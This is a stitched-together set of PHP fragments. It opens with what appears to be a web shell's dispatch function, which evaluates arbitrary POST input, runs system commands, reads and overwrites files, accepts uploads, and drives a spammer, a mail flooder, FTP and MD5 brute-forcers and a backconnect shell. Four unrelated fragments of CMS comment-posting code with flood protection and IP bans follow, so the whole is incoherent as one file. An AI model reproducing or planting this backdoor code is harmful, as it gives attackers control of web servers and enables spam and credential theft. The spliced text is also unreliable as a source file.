function shell() { if ($_POST['type'] == 1) { eval(stripslashes($_POST['value'])); } elseif ($_POST['type'] == 2) { pwd(); print_r(ex(stripslashes($_POST['value']))); } elseif ($_POST['type'] == 3) { if ($_SESSION['safe_mode'] == 1) { if (($u = safe_ex('ls -la')) != '') { return $u; } else { return safe_ex('dir'); } } else { if (($u = ex('ls -la')) != '') { return $u; } else { return ex('dir'); } } } elseif ($_POST['type'] == 4) { if (file_exists(stripslashes($_POST['value']))) { if ($safe_mode != 1) { echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']), "rw"), filesize(stripslashes($_POST['value'])))); } else { echo htmlspecialchars(safe_read(stripslashes($_POST['value']))); } $_SESSION['edit'] = 1; $_SESSION['filename'] = $_POST['value']; } else { return 'File doesn\'t exists!'; } } elseif ($_POST['type'] == 5) { fputs(fopen($_SESSION['filename'], "w"), stripslashes($_POST['value'])); } elseif ($_POST['type'] == 6) { $uploaddir = pwd(); if (!($name = $_POST['newname'])) { $name = $_FILES['userfile']['name']; } move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name); } elseif ($_POST['type'] == 7) { echo alias($_POST['value']); } elseif ($_POST['type'] == 8) { echo spammer(stripslashes($_POST['from']), stripslashes($_POST['subject']), stripslashes($_POST['msg']), stripslashes($_POST['check']), stripslashes($_POST['elist']), stripslashes($_POST['logf'])); } elseif ($_POST['type'] == 9) { echo ftp_brute(stripslashes($_POST['host']), stripslashes($_POST['users']), stripslashes($_POST['passwd']), stripslashes($_POST['log'])); } elseif ($_POST['type'] == 10) { echo flooder(stripslashes($_POST['log']), stripslashes($_POST['to']), stripslashes($_POST['from']), stripslashes($_POST['subject']), stripslashes($_POST['msg']), stripslashes($_POST['amount']), stripslashes($_POST['check'])); } elseif ($_POST['type'] == 12) { echo backconnect(stripslashes($_POST['ip']), stripslashes($_POST['port']), stripslashes($_POST['method'])); } elseif ($_POST['type'] == 13) { echo backconnect(stripslashes($_POST['port']), stripslashes($_POST['pass']), stripslashes($_POST['method'])); } elseif ($_POST['type'] == 14) { echo md5_brute(stripslashes($_POST['hash']), stripslashes($_POST['log']), stripslashes($_POST['dict'])); } else { $u = ex('ls -la'); if ($u == '') { return ex('dir'); } else { return $u; } } return null; }
$CN_HALT = TRUE; } if ($comments == '') { $stop[] = $lang['news_err_11']; $CN_HALT = TRUE; } if ($parse->not_allowed_tags) { $stop[] = $lang['news_err_33']; $CN_HALT = TRUE; } if ($parse->not_allowed_text) { $stop[] = $lang['news_err_37']; $CN_HALT = TRUE; } if ($member_id['user_group'] > 2 and intval($config['flood_time']) and !$CN_HALT) { if (flooder($_IP) == TRUE) { $stop[] = $lang['news_err_4'] . " " . $lang['news_err_5'] . " {$config['flood_time']} " . $lang['news_err_6']; $CN_HALT = TRUE; } } if ($config['tree_comments']) { if ($_POST['parent'] and intval($_POST['parent']) > 0) { $parent = intval($_POST['parent']); } else { $parent = 0; } if ($_POST['indent'] and intval($_POST['indent']) > 0) { $indent = intval($_POST['indent']); } else { $indent = 0; }
return FALSE; } //---------------------------------- // Check if IP is blocked or wrong //---------------------------------- $is_ban = (user_getban($ip) or user_getban($name)) ? true : false; // user really banned if ($is_ban) { echo '<div class="blocking_posting_comment">' . lang('Sorry but you have been blocked from posting comments') . '</div>'; return FALSE; } //---------------------------------- // Flood Protection //---------------------------------- if ($config_flood_time != 0 and $config_flood_time != "") { if (flooder($ip, $id) == true) { echo '<div class="blocking_posting_comment">' . str_replace('%1', $config_flood_time, lang('Flood protection activated! You have to wait %1 seconds after your last comment before posting again at this article')) . '</div>'; return FALSE; } } //---------------------------------- // Check if the name is protected //---------------------------------- $user_member = user_search($name); // In case if enter another name if ($CNname && $CNpass && $CNname != $name or $name && $_SESS['user'] && $_SESS['user'] != $name) { echo proc_tpl('remember'); echo getpart('forget_me_script'); $refer = $_SERVER['HTTP_REFERER']; echo proc_tpl('wrong_user'); return FALSE;
} if ($answer and $answer == $question_answer) { $pass_answer = true; break; } } } if (!$pass_answer) { $stop .= $lang['reg_err_24']; } } else { $stop .= $lang['reg_err_24']; } } if ($user_group[$member_id['user_group']]['flood_news']) { if (flooder($member_id['name'], $user_group[$member_id['user_group']]['flood_news'])) { $stop .= "<li>" . $lang['news_err_4'] . " " . $lang['news_err_43'] . " {$user_group[$member_id['user_group']]['flood_news']} " . $lang['news_err_6'] . "</li>"; } } $max_detected = false; if ($user_group[$member_id['user_group']]['max_day_news']) { $row = $db->super_query("SELECT COUNT(*) as count FROM " . PREFIX . "_post WHERE date >= '" . date("Y-m-d", $_TIME) . "' AND date < '" . date("Y-m-d", $_TIME) . "' + INTERVAL 24 HOUR AND autor = '{$member_id['name']}'"); if ($row['count'] >= $user_group[$member_id['user_group']]['max_day_news']) { $stop .= "<li>" . $lang['news_err_44'] . "</li>"; $max_detected = true; } } if ($stop) { $stop = "<ul>" . $stop . "</ul><a href=\"javascript:history.go(-1)\">{$lang['all_prev']}</a>"; msgbox($lang['add_err_6'], $stop); }
if (isset($HTTP_X_FORWARDED_FOR)) { $ip = $HTTP_X_FORWARDED_FOR; } elseif (isset($HTTP_CLIENT_IP)) { $ip = $HTTP_CLIENT_IP; } if ($ip == "") { $ip = $REMOTE_ADDR; } if ($ip == "") { $ip = "not detected"; } # keep scriptkiddies out settype($id, "int"); # Check Flood Protection if ($config_flood_time != 0 and $config_flood_time != "") { if (flooder($ip, $id) == TRUE) { echo "<div style=\"text-align: center;\">{$lang_floodprot}</div>"; $CN_HALT = TRUE; break 1; } } # Check if IP is banned $blockip = FALSE; $old_ips = file("{$cutepath}/data/ipban.db.php"); $new_ips = fopen("{$cutepath}/data/ipban.db.php", "w"); @flock($new_ips, 2); foreach ($old_ips as $null => $old_ip_line) { $ip_arr = explode("|", $old_ip_line); # ?id = "168". ?title = "Ban partial IPs"; $_allowed = true; $this_banned_ip = str_replace('.', '\\.', $ip_arr[0]);